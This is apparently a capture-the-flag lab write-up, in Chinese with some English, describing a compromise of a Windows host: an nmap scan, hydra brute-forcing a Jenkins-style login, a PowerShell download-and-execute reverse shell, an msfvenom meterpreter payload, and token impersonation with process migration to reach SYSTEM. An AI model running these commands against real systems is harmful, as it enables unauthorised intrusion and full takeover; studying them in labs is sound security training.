Rustscan寄掉了
应该是有检测
nmap -p- --min-rate=5000 -Pn 10.10.193.34

Pasted%20image%2020240412091818

hydra爆破
j_username=admin&j_password=123456&from=%2F&Submit=Sign+in

admin:admin登录

然后用他那个工具来反弹shell

powershell iex (New-Object Net.WebClient).DownloadString('http://10.17.6.173/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.17.6.173 -Port 9999


powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.17.6.173/shell-name.exe','shell-name.exe')"

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.17.6.173 LPORT=10000 -f exe -o shell-name.exe

msfconsole -qx 'use exploit/multi/handler;set lhost 10.17.6.173;set lport 10000;set payload windows/meterpreter/reverse_tcp;run'

成功拿到msf的shell

然后提权

令牌

  • Primary access tokens(主访问令牌:与登录时生成的用户帐户关联的令牌)
  • Impersonation tokens(模拟令牌:这些令牌允许特定进程(或进程中的线程)使用另一个(用户/客户端)进程的令牌访问资源)

对于模拟令牌

  • SecurityAnonymous:当前用户/客户端无法模拟其他用户/客户端
  • SecurityIdentification:当前用户/客户端可以获取客户端的身份和权限,但不能冒充客户端
  • SecurityImpersonation:当前用户/客户端可以在本地系统上模拟客户端的安全上下文
  • SecurityDelegation:当前用户/客户端可以在远程系统上模拟客户端的安全上下文

账户权限下常见的滥用提权

  • SeImpersonatePrivilege
  • SeAssignPrimaryPrivilege
  • SeTcbPrivilege
  • SeBackupPrivilege
  • SeRestorePrivilege
  • SeCreateTokenPrivilege
  • SeLoadDriverPrivilege
  • SeTakeOwnershipPrivilege
  • SeDebugPrivilege
meterpreter > shell
Process 2520 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\bruce\Desktop>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                  Description                               State   
=============================== ========================================= ========
SeIncreaseQuotaPrivilege        Adjust memory quotas for a process        Disabled
SeSecurityPrivilege             Manage auditing and security log          Disabled
SeTakeOwnershipPrivilege        Take ownership of files or other objects  Disabled
SeLoadDriverPrivilege           Load and unload device drivers            Disabled
SeSystemProfilePrivilege        Profile system performance                Disabled
SeSystemtimePrivilege           Change the system time                    Disabled
SeProfileSingleProcessPrivilege Profile single process                    Disabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority              Disabled
SeCreatePagefilePrivilege       Create a pagefile                         Disabled
SeBackupPrivilege               Back up files and directories             Disabled
SeRestorePrivilege              Restore files and directories             Disabled
SeShutdownPrivilege             Shut down the system                      Disabled
SeDebugPrivilege                Debug programs                            Enabled 
SeSystemEnvironmentPrivilege    Modify firmware environment values        Disabled
SeChangeNotifyPrivilege         Bypass traverse checking                  Enabled 
SeRemoteShutdownPrivilege       Force shutdown from a remote system       Disabled
SeUndockPrivilege               Remove computer from docking station      Disabled
SeManageVolumePrivilege         Perform volume maintenance tasks          Disabled
SeImpersonatePrivilege          Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege         Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege   Increase a process working set            Disabled
SeTimeZonePrivilege             Change the time zone                      Disabled
SeCreateSymbolicLinkPrivilege   Create symbolic links                     Disabled

可以看到SeDebugPrivilege Debug programs Enabled

ctrl z退出shell
在msf会话load incognito

list_tokens -g

meterpreter > list_tokens -g
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
\
BUILTIN\Administrators
BUILTIN\Users
NT AUTHORITY\Authenticated Users
NT AUTHORITY\NTLM Authentication
NT AUTHORITY\SERVICE
NT AUTHORITY\This Organization
NT SERVICE\AudioEndpointBuilder
NT SERVICE\CertPropSvc
NT SERVICE\CscService
NT SERVICE\iphlpsvc
NT SERVICE\LanmanServer
NT SERVICE\PcaSvc
NT SERVICE\Schedule
NT SERVICE\SENS
NT SERVICE\SessionEnv
NT SERVICE\TrkWks
NT SERVICE\UmRdpService
NT SERVICE\UxSms
NT SERVICE\Winmgmt
NT SERVICE\wuauserv

Impersonation Tokens Available
========================================
No tokens available

impersonate_token "BUILTIN\Administrators"

模拟这个令牌

Even though you have a higher privileged token, you may not have the permissions of a privileged user (this is due to the way Windows handles permissions - it uses the Primary Token of the process and not the impersonated token to determine what the process can or cannot do).
即使你拥有更高的特权令牌,你也可能没有特权用户的权限(这是由于 Windows 处理权限的方式 - 它使用进程的主令牌而不是模拟的令牌来确定进程可以做什么或不能做什么)。

Ensure that you migrate to a process with correct permissions (the above question’s answer). The safest process to pick is the services.exe process. First, use the ps command to view processes and find the PID of the services.exe process. Migrate to this process using the command migrate PID-OF-PROCESS
确保您迁移到具有正确权限的进程(上述问题的答案)。最安全的工艺是services.exe工艺。首先,使用 ps 命令查看进程并查找services.exe进程的 PID。使用命令 migrate PID-OF-PROCESS 迁移到此进程

meterpreter > ps | grep services
Filtering on 'services'

Process List
============

 PID  PPID  Name          Arch  Session  User                 Path
 ---  ----  ----          ----  -------  ----                 ----
 668  580   services.exe  x64   0        NT AUTHORITY\SYSTEM  C:\Windows\System32\services.exe

migrate 668
迁移到这个进程后就可以cat了